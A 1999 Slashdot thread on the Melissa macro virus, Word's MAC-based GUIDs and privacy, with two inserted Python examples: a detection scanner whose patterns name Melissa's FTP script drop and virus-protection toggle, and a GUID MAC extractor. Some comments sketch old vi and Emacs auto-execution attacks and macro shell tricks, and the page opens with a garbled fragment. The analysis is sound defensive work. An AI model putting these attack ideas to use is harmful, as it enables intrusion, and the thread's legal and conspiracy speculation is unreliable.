mmm y
Logfile -->3) &
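Running `strings` over a suspect document, as the poster above did, is about as far as quick triage on a Unix box gets. Here is an added example (my code, not anything posted in this thread or shipped by Microsoft) that automates that triage in Python: a minimal `strings` equivalent plus a few indicator patterns lifted from the fragments quoted in the post (the VirusProtection toggle, the `MS Setup (ACME)\User Info` registry key, the `ftp.exe -n -s:` script drop and the NormalTemplate infection marker). The sample bytes are constructed for the demo and are not the real Melissa file, and the indicator names are mine.

```python
import re

# Constructed sample bytes for the demo: fragments modelled on the strings quoted
# in the post above, separated by non-printable padding. Not the real Melissa file.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"          # OLE2 compound-file magic, as in real .doc files
    b"\x00\x00Switch the VirusProtection OFF\x00"
    b"\x07HKEY_CURRENT_USER\\Software\\Microsoft\\MS Setup (ACME)\\User Info\x00"
    b"\x01\x02/c ftp.exe -n -s:c:\\netldx.vxd\x00"
    b"Infect the NormalTemplate\x00\x00"
    b"abc\x00"                                   # too short to count as a string
)

# A constructed document with ordinary text and no macro indicators.
CLEAN_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00"
    b"Quarterly report\x00Prepared by finance\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Same idea as strings(1): runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Indicator names are mine; the patterns come from the strings quoted in the post.
INDICATORS = {
    "virus-protection-toggle": re.compile(r"VirusProtection", re.I),
    "office-userinfo-registry-key": re.compile(r"MS Setup \(ACME\)\\User Info", re.I),
    "ftp-script-drop": re.compile(r"\bftp\.exe\s+-n\s+-s:", re.I),
    "normal-template-infection": re.compile(r"Infect the NormalTemplate", re.I),
}


def scan(data: bytes) -> dict:
    """Map each indicator name that fired to the strings that triggered it."""
    hits = {}
    for s in extract_strings(data):
        for name, pat in INDICATORS.items():
            if pat.search(s):
                hits.setdefault(name, []).append(s)
    return hits


def verdict(data: bytes, threshold: int = 2) -> str:
    """Flag a file once at least `threshold` distinct indicators fire."""
    n = len(scan(data))
    if n == 0:
        return "no macro indicators"
    if n >= threshold:
        return "suspicious"
    return "weak"


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_DOC), ("clean", CLEAN_DOC)):
        print(label, verdict(doc))
        for name, strs in scan(doc).items():
            print("  ", name, "->", strs)
```

The string extraction is deliberately the same crude thing `strings` does, so it will miss anything Word tokenizes or compresses (the later post on this page notes that the full macro text is not recoverable this way); the point is that the clear-text comments and the registry path are enough to flag a file for a closer look.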
But will people really blame Microsoft? When we had gas
shortages in the mid 70-s, I recall people
blaming the Arabs, the oil companies, and the government.
But few blamed the car manufacturers, who had
been pushing gas-chugging monsters for more than a decade,
or themselves, for buying those cars.
If I remember correctly, Melissa & Melissa's "Poppa" get around the so-called "macro virus protection" in Office 97 by telling Office 97 to turn it off (without informing you). I don't think you should give M$ any credit at all.
Those who would give up freedom for security will deserve and receive neither.
5-10 years and $350,000? What the f*ck is that? Maybe Microsoft should be slapped with a class action lawsuit for setting up the infrastructure that allowed this virus to spread.
This punishment does NOT fit the crime done. Basically, all this guy did was write some code (if you want to call it that). I will not deny the code was malicious, but we don't know why he did it. I could see someone trying stuff like this "just for the hell of it". Besides, if this guy hadn't done it, that security hole would have remained, and if it had been presented a year from now (presumably when even more people will be using email) it could have been MUCH worse.
Basically, they are setting the punishment based on the fact that is scared the shit out of the FBI and lots of other people, not based on the actual crime commited.
Doesn't it scare people here what can happen to you for programming something on a computer?
In the mean time, in order to get back at him, might I suggest you:
Stop contributing code.
Cancel that membership check.
Cancel that donation check.
Halt shipment of that new hardware you sent.
Stop contributing stories.
Stop making helpful suggestions.
Oh, wait, my bad, you DON'T do any of this. Ok, so that gives you... WHAT right to tell him how to run the site HE built, and HE funded, and HE works full time on?
If YOU, being God and all, feel you can do a BETTER job, then do it. Surely one with your wisdom and 377373 news posting skills can build a better slashdot than slashdot. And when you do, the masses will flock to it... right?
*If you make no effort to help, then DON'T knock a free service provided by the generosity of an (ex)student's heart!*
Jackass...
--
Just lurking, thanks!
Uhm... "law enforcement officials" ?
----------------- ------------ ---- --- - - - -
Your honor is perfectly understandishable.
What happened to privacy? Well, basically commercialism. Microsoft (or just about any company anymore) wants to get as much information as they can on users (refer to that whole banking deal a while back). They've got an OS, office program, various programming programs, all using proprietary file formats. Now considering all this is done with closed source, no specs on the file formats, etc, who's going to know that there's MAC address and whatever else they want to include in your Word document? All the while, they are crying, "Closed information is the only way to be secure!! Open source means you'll be hacked into!! Arggggggggggh!"
Didn't the original articles on this information being in documents say something like it dated back even into the Windows 3.1 era? So, they've gotten away with it for all these years. And now we're starting to see just what these sort of companies want from us.
Starcraft was sending all kinds of information from the registry to their battle.net servers if you typed an invalid password, as well. Of course they wrap it around, "We did it to help our customers, yeah, that's it, help them." And Intel really just put the ID in the P-III as a replacement for cookies, remember web page settings, sure.
So all this is going on all these years, and people just don't care. They accept the products from giant corporations, and go with it.
With all this going on, Open Source really can take the lead in security/privacy concerns. We need to shout, "Here are our guts, program code, file formats, etc. Critique them, find holes/problems." Only with open sources can people be REALLY sure none of these scrupulous programmers include this sort of information in files.
Or better yet, can two different MAC address possibly generate the same GUID?
It may have once meant Revisable Text Format...but all documentation I've read of late calls it RICH Text Format (meaning that it can have font properties and color).
-=Mongr=-
From the way I read it, it sounded like they didn't even need the GUID to catch the guy, they had already traced Patient Zero to the alt.sex newsgroup and had his AOL address, which they could easily have turned into a real name and address with the correct warrant.
...for me, at any rate. :)
I use only MacOS and Linux, have never owned a copy of Word, and to the best of my knowledge there is nothing vaguely resembling a COM object anywhere on my system, even without my taking special precautions.
Of course, in order to be able to say this I had to NOT USE MICROSOFT PROGRAMS, so obviously I'm the loony, right? It's just, well, not normal not to use Microsoft programs. Even Linux users use Microsoft programs (on the average). At least I have the consolation of this: it'll be easier for me to convince the FBI not to have me shot as owner of the GUID, because there's never been any indication that I _could_ write macro virii, due to my lack of Microsoft programs
Such a world we live in! o_O
You mean, you haven't already? :P
Mine are in RTF, plain text, and I'm thinking about trying out HTML (hate trying to get everything lined up correctly though).
I think it's time for a new format (OTF maybe?)
There is nothing wrong with using PINE to do email. I have been for over a year and other than the fools that send me WINMAIL.DAT attachments it works fine! Hell, it even works via telnet so I can be almost anywhere on the planet and still get my mail.
Posted by speed1:
This just shows how MS programs with poor security can lead to an invasion of privacy.
We can see in this case how it's being used to track the author of Melissa...how long will it take so they can track down anyone else.
As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certainly use this as a showcase.
On the other hand, doesn't the ease with which those GUIDs were traced suggest how easily everybody's privacy can be broken into?
I would say that with the right spin (where are those privacy groups when you need them?) this case could be a perfect demonstration of what the GUID/Privacy issue a few weeks ago was all about.
M$ blatantly mishandled their users' privacy by putting GUIDs into each document that are so easy to be traced - even by outsiders, like those two guys from the ZDNet story.
Posted by Dr. Bert:
I'm all for crucifixion of digital vandals. But this is a perfect example of why I refuse to use Microsoft products for any reason.
Posted by skitzo:
I find it hard to believe that anyone could trust this stupid ID tracking system MS has embedded into their programs...I also don't know about the validity of this argument that they can even track the person who has created it. It seems like an overly bloated attempt to make something of nothing simply because of the quick spread of the virus. Lastly, anyone who has been infected ought to rethink their attempt to be computer savvy because it's obviously not working.
lataz...
Posted by Bryan Lawson:
Given that so many know vb, especially so many new young programmers who are still pumped with their rebel phase, and know (and have known for a LONG time - microsoft?) how easy it is to create macro virii, I am surprised we haven't seen more Melissa types ages ago. We are certainly gunna see a lot more now, as the mutations and copies already surfacing show.
I just hope the media pick up on the fact that this wouldn't (couldn't) happen if ms showed at least a modicum of respect for user level security.
Remember, Kenneth Starr couldn't tape record Monica Lewinsky's phone conversations w/o her consent or a warrant, but Linda Tripp could as she is a private citizen and not subjected to the same restrictions as law enforcement.
Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal... in others, completely illegal and inadmissible by Starr. I guess he was lucky it was in DC. *grin*
My point was that the illegal search argument would be what I would use as a defense since there is no clear precedent set in this regard. Information obtained by a 3rd party without the defendant's knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.
If I planted a bug in your system (via a macro virus, yaay!) that logged all keystrokes and internet traffic, would I then be allowed to prosecute you when you went to a kiddie-porn site or downloaded the latest Quake III warez? I don't think so because I, as a 3rd party, violated your private space. I would actually be PROSECUTED as such. The argument can be made (and possibly successfully) that MS violated this person's private space by recording unique information about that space and broadcasting it publicly (even if embedded in a document now made public).
If you can read this message, your threshold is too low.
Essentially, MS Word does a type of digital signing on a document. If you release a signed file, well... too bad.
Since this digital signature is hidden from the user completely, I disagree that once you release the document publicly, it's your fault the data got out.
If Outlook attached your credit card number to each outgoing mail message without your knowledge, would you then be liable for all fraudulent purchases on that card since you sent an email? No, I don't think you would be.
I don't see how someone can be held responsible for consequences of sending out data that they do not know is being sent.
If you can read this message, your threshold is too low.
Just as it's not a problem for the Gov't to take fingerprints off a letter that you sent or DNA samples from the saliva you used to lick a stamp or an envelope shut. Once you voluntarily give something up, it's fair game for the man.
I agree completely, except that until recently, no one even KNEW they were giving up their MAC address simply by publishing a Word document. Considering how new this knowledge is, it's safe to say that many STILL do not know.
You can only voluntarily give up something you KNOW you have... the unknown data attached to it without your consent by a 3rd party should not fall under these same rules.
How many people (beyond slashdot) even KNOW what a MAC address is and how it's created?! I would venture a guess that 65% of computer users are clueless about this aspect of networking technology.
If you can read this message, your threshold is too low.
I will have to research the cases you cite, thanks for pointing those out.
I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedent, why wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and cameras in crack houses to get evidence?
I think there may be a fine (although gray) line between inadvertent discovery during a crime and outright pursuance of evidence during a crime. This may explain why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose of taping what I do in my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found subsequently would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)
To me this is a clear distinction. The MAC address is not attached to the word doc by chance, it was programmed to do that, specifically. This "theft" of unique personal data was not inadvertent, rather it was blatant.
If you can read this message, your threshold is too low.
First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.
What spec? Since word documents use a proprietary format, I don't think there is an open spec available for inspection by the public. If there IS such a document, please point me towards it. If there is NOT such a document available to the public, then I would still consider embedded MAC addresses in .doc files as "recently discovered".
The ZDNet article also goes into detail about how the GUID was matched with another GUID from a document on a website owned by a known virus author. Considering the uniqueness of the MAC address utilized in the GUID, it is highly unlikely, if not impossible that the two documents were not created by the same machine.
The report never mentioned anything about using the gathered MAC address from Windows 98 registrations to track down this person. Where are you getting that from?
If you can read this message, your threshold is too low.
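Since this sub-thread turns on what a MAC-derived GUID actually reveals, here is an added example (my code, not anything from the thread or from Microsoft) that pulls the node field out of a GUID with Python's standard `uuid` module. It assumes the document GUID uses the time-based, version-1 layout, in which the last 48 bits are the generating machine's IEEE 802 address; the article cited above says only that the GUID is "in part based on the MAC address" and does not name the layout, so that is my assumption. The GUID values are constructed for the demo. `same_machine` does nothing more than compare node fields, which is exactly the evidentiary weakness raised earlier in the thread: a match ties two documents to one network card, not to one author.

```python
import uuid

# Added example. Assumption: document GUIDs follow the RFC 4122 version-1
# (time-based) layout, whose 48-bit node field carries the generating NIC's MAC.


def format_node(node: int) -> str:
    """Render the 48-bit node field as a colon-separated MAC string."""
    return ":".join(f"{(node >> (8 * i)) & 0xff:02x}" for i in range(5, -1, -1))


def describe_guid(guid_text: str) -> dict:
    """Report what a GUID exposes about the machine that generated it."""
    u = uuid.UUID(guid_text)
    info = {"version": u.version, "variant": u.variant}
    if u.version == 1:
        node = u.node
        first_octet = (node >> 40) & 0xff
        info["node_mac"] = format_node(node)
        # RFC 4122: a node field that is not a real IEEE 802 address must have the
        # multicast bit (bit 0 of the first octet) set, so a clear bit is the sign
        # that a genuine, globally unique card address was embedded.
        info["node_looks_like_real_mac"] = (first_octet & 0x01) == 0
        info["clock_seq"] = u.clock_seq
        info["timestamp_100ns"] = u.time  # 100 ns ticks since 1582-10-15
    return info


def same_machine(guid_a: str, guid_b: str) -> bool:
    """True when both GUIDs are version 1 and carry the same node (MAC) field.

    This is the whole basis of the "matched GUIDs" evidence discussed above: it
    identifies a network card, not a person, and the field can be copied.
    """
    a, b = uuid.UUID(guid_a), uuid.UUID(guid_b)
    return a.version == 1 and b.version == 1 and a.node == b.node


def constructed_samples() -> dict:
    """Constructed GUIDs for the demo (not values taken from the page)."""
    return {
        "doc_a": str(uuid.uuid1(node=0x001122334455, clock_seq=0x1234)),
        "doc_b": str(uuid.uuid1(node=0x001122334455, clock_seq=0x0042)),
        "random_node": str(uuid.uuid1(node=0x011122334455, clock_seq=0x1234)),
        "v4": str(uuid.uuid4()),
    }


if __name__ == "__main__":
    s = constructed_samples()
    for name, g in s.items():
        print(name, g, describe_guid(g))
    print("doc_a and doc_b from same NIC:", same_machine(s["doc_a"], s["doc_b"]))
    print("doc_a and v4 from same NIC:", same_machine(s["doc_a"], s["v4"]))
```

The `node_looks_like_real_mac` check is the privacy-relevant bit: a generator that follows the RFC and uses a random node sets the multicast bit, so a GUID whose node has that bit clear is advertising a hardware address rather than a throwaway value.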
Your points are very valid regarding current privacy statutes. My point was that this is uncharted waters and the argument could (should?) be made against 3rd party distribution of our unique data without our knowledge.
People are well aware of Caller-ID and there is a publicly available mechanism to disable this feature. I have no problems with that.
I'm not suggesting this argument to get around the crime itself, I'm suggesting it as a way to protect others from being victimized for non-criminal acts that may be unpopular.
If it stands that 3rd parties can "implant" everything you do with an ID that you do not know about or cannot turn off, free anonymous speech will disappear as we know it. That's my main concern.
If you can read this message, your threshold is too low.
I wholeheartedly agree. Many are missing the bigger picture in this instance.
If federal authorities USE this 3rd party tracking mechanism to convict, it will VALIDATE the notion that anyone, as long as they are not law enforcement, can implant people, their ideas, and their works with hidden identifiers to track them down at a later date.
In many respects, this is similar, if not identical to key escrow.
If this evidence IS used against this person, Bell Atlantic/Pac Bell may just start tapping our phone lines TOMORROW with the off chance that we will say something that can be used against us in court. It would be the same thing since it's a 3rd party, NOT law enforcement, invading our privacy to gather evidence against us.
If you can read this message, your threshold is too low.
I'm not sure if use of such GUID's would hold up in court since it is private information gathered by an illegal search. The user did not give permission for his unique ID to be attached to his .doc file. The app (Word) had no just cause to attach this ID either so it's similar to having the feds tap your phone without a warrant.
While I am not defending this moronic macro virus creator, I do think that utilizing these GUID's is setting a BAD standard in regards to a person's right to publish anonymously.
What's next, they track down the GUID of the person who wrote an anti-Clinton .doc and posted it online?
If you can read this message, your threshold is too low.
It used to be that the biggest security hole in any network was a badly configured firewall (or lack thereof), now it's MS Word and MS Outlook!
...
I can just see the day this was decided at The Collective
[Insert wavy flashback effect]
Five of Seven: "Hey, Three of Five, let's give Word the ability to run external executables!"
Three of Five: "Cool! But let's make it so that it can do this from within a macro!"
Five: "Sounds good. How about we add a startup macro that launches when the document is opened?"
Three: "Hmm, should we allow the user to turn off startup macros?"
Five: "Hahaha! What for? No one is going to use this for evil! This is a Good Thing[tm]!"
[Fade back to present]
Sad, just plain goddam sad.
Boobies never hurt anyone. - Sherry Glaser.
This just gets down to the point.. we really need easier ways for government and industry to track our movements. Perhaps something injected into the arm at birth that would constantly relay a signal to a series of receivers? This way we can easily track those evil criminals and bad people and find lost children and do all kinds of good stuff. :-) *sarcasm*
Hey, I like word macros.
How else are you supposed to get a shell on a system that's "secured"? (okay, I know, there are tons of ways, like Excel macros, or not-disabled Windows function keys, or changing, say, the Telnet proxy in netscape to run the command interpreter...)
I think one of my favorite oxymorons is "Windows Security". It's a good analogy, too. Want to break into a house? Break a window.
pb Reply or e-mail; don't vaguely moderate.
Heh. I'd been thinking the same exact thing when I saw this headline on the front page. Gee, wouldn't it be interesting...
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
My understanding was that it was a VBscript macro virus. So basically, unless you open a Word/Excel/whatever document up that contains the macro virus, it has no scripting host to run on, so you can't pick it up that way.
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
Did you READ the article?
If you had, you'd note that it said the GUID number is in part based on the MAC address of the system's Ethernet card. Please, read the article next time. You'll be more informed, and everyone will be happier.
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
Absolutely! It is a very slippery slope, and we've already started down it. I notice that ID chip implants are already becoming common for pets. That gets the chips into mass manufacture, and gets the chip readers out there.
The next 'great beneficial use' will probably be the mentally infirm. Once it helps out there, children will be next. Don't be surprised to find out it's a lot easier to get the chip implanted in a 3 year old than it is to have it REMOVED from an 18 year old. (beyond the fact that it's harder to dig one out than to put one in).
That some loser on AOL wrote a virus for the biggest abomination of an office suite on the planet? This goes back to the monkey theory, I think. Heh. :)
First of all, some of the mailservers were put out of operation, and some sites had to disconnect mail service. That's harm.
Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M.
Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.
Fourth, the message sent would be likely to cause problems between the sender & recipient.
I see no way in which the virus *isn't* harmful.
hawk, esq.
If you're looking for me to argue that MS products are any good, look elsewhere :) The last ones I have *anything* non-negative to say about are word 5.1 and excel 4.
But harmful as the products may be, and even if they're more dangerous than the virus, the fundamental legal difference is permission (except for transmission of data to microsoft, which would also violate assorted laws)
hawk, esq.
It's not the *writing*, but the willful and knowing *release* of the virus that's a crime.
The Common Law, and I presume most other legal systems, attribute the same intent to the natural consequences of an act as the act itself. Even without any modern "computer" crimes, the release & spread created numerous criminal trespasses against chattels (improper contact with machine), vandalism, and (the law of the individual state permitting) a general common law misdemeanor.
Larceny (theft) probably wouldn't cut it in this case, as an element is the intent to permanently deprive.
hawk, esq.
And no, this isn't legal advice.
While I am probably being paranoid and overly
sceptical, it's way too convenient that the
Win98 ID bug, only uncovered recently, is
suddenly going to be the life saver for solving
the Melissa problem. And all only 2 weeks
before the anti-trust trial resumes.
But, even if this is the case, I really wish
there was something that could be done against
M$ for introducing the entire concept of Word
viruses to the world; if they had introduced
the security needed into the vis basic routines
when they first put out Word 6, things wouldn't
be as rampant now.
Plus, this only goes to show that when only
one company makes all the programs that you use,
it's rather easy to find all the loopholes between
them all. (Hint, there's better, more
established ways to do interprocess communication
than a proprietary system).
"Pinky, you've left the lens cap of your mind on again." - P&TB
"I can see my house from here!" - ST:
the interesting thing is that the virus doesn't *DO* anything harmful, except spam mailservers.
-Stu
Since a word document only has the GUID of the original document author, and all these Word Macro viruses are made by taking somebody else's Word Macro Virus (WMV) document and modifying it, all the GUID does is point back at some guy who wrote the original WMV that was the grandfather of Melissa. See this article
for more details.
"Ten years from now, they could do it in a few seconds." -- The Racketeer of the Hellfire Club, 1993, Phrack 42
And this is different than Emacs how?
Oh, I forgot, Emacs uses Lisp.
SPF support for most open source mail servers can be found at libspf2.
NO!
Vi used to execute the .exrc file in any directory, including /tmp. You would simply leave a nasty .exrc file in /tmp, wait for people to use a program such as a mail reader that forks off a copy of vi to edit a temporary file and *poof*, you have got them!
With Emacs, you can put the special tags in any file, and if they are close enough to the start or end of the file, they used to be silently executed. Just email someone with the tags at the end, and if it is the last message in the mail box, *poof* you have got them!
Ten years ago, these were the *DEFAULTS* for two of the most popular editors on UNIX. They were used in universities which had large numbers of users. UNIX was the most common OS on the Internet. It was a serious problem. The UNIX folks had to learn to set the defaults correctly, just like I hope MS (and other software companies) learns. It is just too bad they didn't learn from the past.
SPF support for most open source mail servers can be found at libspf2.
VI used to read any ".exrc" file in the current directory, which could be used to create macro virii. To the best of my knowledge, this option is now turned off by default. (I don't use vi much...)
Emacs will execute code that is embedded in a file if it has the right tags around it. For example, I have this glob at the end of my .mailrc file:
About 10 years ago, emacs was changed from automatically and silently running this kind of code, to having the code displayed to the user and a y/n prompt given. Before that time, it was possible to trick Emacs's RMAIL command to propagate a virus through email. Still, I am not sure that Emacs's solution is that great. You can still turn the prompting off, and it assumes that the user knows enough about Emacs and Lisp to understand the code.
I think the real difference between OSS and MS is that OSS ran into these problems long before the Internet became known to the general public.
SPF support for most open source mail servers can be found at libspf2.
not a month ago, we were having such a fit about MS IDs, and now, a *news-making* macro virus hits, and, TADA! A legitimate use is found for the MS ID.
Too, too funny. Nice try, Microsoft.
Stating on Slashdot that I like cheese since 1997.
User space has nothing to do with it. Or do you suddenly not have the ability to send email from the command line from your user account?
The reality of this is that StarOffice suffers from the same problem, especially since it can run MS Office macros.
Matt. Want XML + Apache + Stylesheets? Get AxKit.
You know, I think what scares me most about this is that the punishment in the US for a computer crime is tougher than the punishment for lots of other crimes. Oh, say, domestic abuse or something like that. So, it's worse for someone to write a macro virus than to slap their wife or girlfriend around.(husband or boyfriend too just to be P.C.) There's something basically wrong with that.
I've had computer viruses. Monkey2 and Ripper to be specific. I remember how utterly frustrating they both were. I do think that there are things much worse however. Keep it in perspective is all I can say.
I dunno. I guess what it comes down to is that I think this says something about our misplaced & completely fucked up value system.
-Randy
- Kate
"DNA is life. The rest is just translation."
But that would be too obvious.
"L'IT c'est moi!"
In point of fact, a user must already have write access to your .mailrc and .emacs files (implying that your account was already insecure) to instigate the sort of "virus" you've pointed out above. Also the code that enables this sort of behaviour is not found in the default versions of these files distributed by OS or application vendors. MS products are *BY DEFAULT* vulnerable, and the malicious user needs no special access to your machine or files to propagate his attack. This is not the case on most other properly administered and installed OS's.
Yet another wonderful aspect of this invasion of privacy is that anyone with a clue could frame anyone that person could get a sample doc from. Releasing the Skyrocket address to the net at large was irresponsible behaviour based on what amounts to hearsay based on an invasion of privacy.
As you pointed out, while strings will give you some juicy tidbits, you can't extract the full macro contents that way (does MS tokenize their VB text?). Neither word2x nor mswordview do anything with macros. LAOLA includes a tool called ELSER which dumps out embedded macros, but it doesn't work with Word97 documents (which Melissa is). The mswordview site even linked to a DOS program called List Word Macros which I tried, and it doesn't support Word97 either.
I'd really like to see a dump of this virus, because I'm curious to see exactly what kind of insecurities a macro language would need to have in order to let the author both scan an address book and send email, without doing anything too suspicious in the UI. Does anyone have any better tools for looking at this file?
--
Jake
Regardless of the privacy implications of GUID storage in Microsoft documents this story is fishy. There's a vast number of documents written with these products and thus a vast number of GUIDs floating about on the internet. To be able to pull up an individual and point the finger at them this quickly is unrealistic, especially given that they say that they found the matching GUID on a web site. They would have to exhaustively search web sites for documents containing the GUID and perform a match on them in order to do this.
The size of the internet says that this isn't possible. If there is any truth to the story at all it means that this guy was under some other form of surveillance and for that reason his documents were specially selected to be matched. Or it could mean that some portion of this is a sham, maybe the guy was never caught, maybe it was a propaganda ploy by either Microsoft or somebody who boosts Microsoft.
Until this story is confirmed by a somewhat credible news site I'll chalk off the capture of the perpetrator as an urban legend.
I have received reports from catdoc users that they were able to read their bosses' future plans, which weren't intended to be sent just now.
yeah, that's a feature of word's "fast save": it uses versioning. so the old text is still there, but not displayed!!
I heard of someone who used catdoc on a job offer he got, and he was able to read the money they had offered to another person!!
and to think the corporate world relies on Word!!
I use Friend/Foe + mod-point modifiers as a karma/reputation system.
Couldn't the feds press charges of terrorism, which carries very severe penalties (life imprisonment and the death penalty are both options) against the virus author? Maybe someone will figure that if they make an example of one cracker, others will be "scared straight".
Since when was it illegal to write a virus?
Since a few virus scares back when politicians passed a specific law about writing viruses (or so I recall).
In this age of information, terrorism need not be physical. With most wealth existing as information outside of physical reality, and companies founded on the shuffling of bits, an "infowar" attack against a strategic economic target could do much more damage than any reasonable number of car bombs. Why blow up the Yoyodyne building when you can instead shoot down their stock price, decimating their value and causing much more damage? Or if that's not spectacular enough, cripple their communications system.
Which is not to say that Melissa is a political or economic terrorist attack, though the age of electronic, entirely non-physical terrorism is coming. It makes much more sense. The future of terrorism looks more like the Sense/Net raid from Neuromancer than the World Trade Center bombing.
It's kinda funny to see the letters AOL on anything that has to do with remotely stupid things.
Though I'm still not sure what frightens me the most; "Virus" coders who leave the door open for prosecutors, M$ software that enables people to track down the author of some word document or thousands of alt.sex regulars who open a .doc file which they found on usenet and don't disable macros.
Strange Times... the future sure should get funny
Executable documents are just plain wrong.
No, they can be made secure and sometimes they can even be useful (especially when you use interactive documents instead of regular applications, for example in a list that checks the consistency of new entries). The problem is that it is extremely difficult to make this secure, and it looks like Microsoft is not putting much effort in making VBA programs embedded in Office documents very secure.
Netscape is quite successful at making HTML+Java/-script quite safe. They are not perfect, as the technology is evolving much too quickly, but it is definitely a proof-of-concept.
(The above paragraph should not leave you with the impression that using Javascript on a HTML page is a good thing - of course you should use LML and Javascript is evil).
This GUID only applies to macro viruses (for MS office programs) or for viruses compiled with an MS compiler. Anyone who wanted to eliminate identity traces could, without too much difficulty, hand craft virus code (either hand assemble, or something similar) to not only eliminate all traces of his/her identity, but also streamline the virus to be leaner and meaner.
As far as I understand the Ethernet specification, although the MAC address, upon which the GUID is based, is set in the factory, it is supposedly resettable by the user with a special utility. (In other words the ID number that is being tracked can be changed.)
So, basically, only malicious hackers who don't know what they are doing, or innocent bystanders will be tracked... also, said hacker could easily frame someone else.
Also, I don't see your justification for assuming everyone who advocates privacy is guilty. Have you ever said anything illegal on the phone? (I doubt it... almost anything you could say on the phone is protected under the 1st amendment.) That said, would you be mad if I suggested all the phone calls you ever made were taped, and would be played before a grand jury? I know I would be livid.
Note: I used the word "hacker" above (and not "cracker") because a "cracker" is one who cracks into other's systems. Not all malicious "hackers" are "crackers". Whether writing a virus to attack other's systems constitutes cracking, I will leave as an exercise for the reader.
Loren Osborn
Ban guns, guns kill people
Ban the internet, the internet spread the virus
Ban microsoft, microsoft sw spread the virus
Ban computers, computers the spread the virus
Isn't this all kinda silly? Let the guy/gal who wrote this thing take the fall. Let everyone take in this lesson and learn from it. Make it a big trial, have lots of publicity, make the person pay for the rest of their life, make it a big example. This is what they now do for people who start forest fires, they bill them for the damage. I don't see how this is any different.
I'm sure Mr. Mitnick has an opinion on this...
i don't know... i was about to post the same thing. this seems way too convenient... how could they have tracked the GUID on the other document that fast?? to me it's almost obvious that this hit came from inside.
"The lie, Mr. Mulder, is most convincingly hidden between two truths."
--
And Justice for None
we're not that far away from that! check out 666!
"The lie, Mr. Mulder, is most convincingly hidden between two truths."
--
And Justice for None
Essentially, MS Word does a type of digital signing on a document. If you release a signed file, well... too bad.
The fact that MS Word doesn't give you the option of turning this off is yet another reason not to use it.
It looks like it FTP's something to 209.201.88.110(codebreakers.org).
I have to return some videotapes...
With all of Micro$oft's sneaky "let me embed all your vital information into all the documents you create" attitude, whatever happened to privacy? Granted, I don't necessarily condone malicious behavior, but any idiot that accepts M$ Word email attachments as normal and reads them deserves to get screwed. Whatever happened to plain text? Bah. M$ can kiss my ass. And because I don't run M$ garbage, Melissa can kiss my ass too.
It works out how to spread by reading your Outlook address book. If you don't have one of those, you aren't part of the problem.
-----
I tried an internal modem, but it hurt when I walked.
(Of course it's less of a resource hog than Outlook.)
Sanity.html - Error 404 not found
...how a total lack of intelligence can look incredibly much like a conspiracy?
MicroSoft: "NT! It's so incredibly easy to administer that all you need to know how to do is point and click!"
Yeah, ok. So where is the nifty pre-packaged little button labelled "bounce all incoming and outgoing messages with the target string in the message body back to sender, with an explanation for why it has been returned"?
It is impossible to make system administration doable by a trained monkey -- there are entirely too many contingencies.
On a similar note, RAD techniques and user coddling combined lead to this kind of thing -- incredibly overly-large, overly-featured, user-coddling pieces of bit-rotted sludge that leave massive doors open, which you cannot close because the so-called "administrators" are busy clicking around with their mice all day, and we keep the users stupid so they don't know that there's a better way.
Bah.
Calling it a virus seems legitimate to me. The defining feature of a computer "virus" is self-propagation, which Melissa does quite profusely. The fact that it needs to be run through an intermediate step shouldn't detract from its self-perpetuating nature.
I believe I read that Rudy Giuliani wanted to collect DNA from every infant at birth. I guess if I knew someone like him had my DNA, cloning would seem like a Good Thing.
---- "If we have to go on with these damned quantum jumps, then I'm sorry that I ever got involved" - Erwin Schrodinger
It doesn't seem likely that MS will ever plug its gaping holes (Bill Gates's mouth, and the security ones). It's easier to shift or hide the blame. AP had an article on the virus yesterday that didn't mention MS or Word even once.
Visual Basic is not part of the HTML standard... what you are talking about is a virus that ONLY affects Windows users who are running MS IE.
Good thing too. Isn't this what Darwinism is all about? Hee hee.. don't see NEARLY as many virii on Linux or MacOS (nasty exception: HK automount virus).
Anyways, back to my point... VB is the same rotten core found in Office - HTML has nothing to do with it. The "finder" of this virus tried to whip up a media scare about HTML, and FAILED...
there is no excuse, and there never will be a valid excuse for violating privacy, no matter what the offense might have been (be it computer virus, murder, terrorism). yeah, maybe you can catch someone doing something bad if they used a M$ product to write the ransom/threat because gates violated their privacy, but what if they used vi?
three can keep a secret, if two are dead - benjamin franklin
As far as I'm concerned, who cares! Its an invasion of privacy none-the-less.
"our prying gov't." here in ireland we elect our gov't. we can vote them out. last i checked, i didn't get a chance to vote for the ceo's of irish companies, never mind american ones.
in case you didn't notice my dear little clueon challenged friend, a private company (being sued by, among others, several gov'ts) came up with the guid.
try voting, running for office or (if you don't have a representative gov't) overthrowing the dictatorship you live in (and surprise the world by replacing it with something that isn't a dictatorship). hey, and in the free time you'll have that's not spent whining you can get a clue!
bonus!
US Citizen living abroad? Register to vote!
The Microsoft security website all but explained to this virus author how he should write his virus.
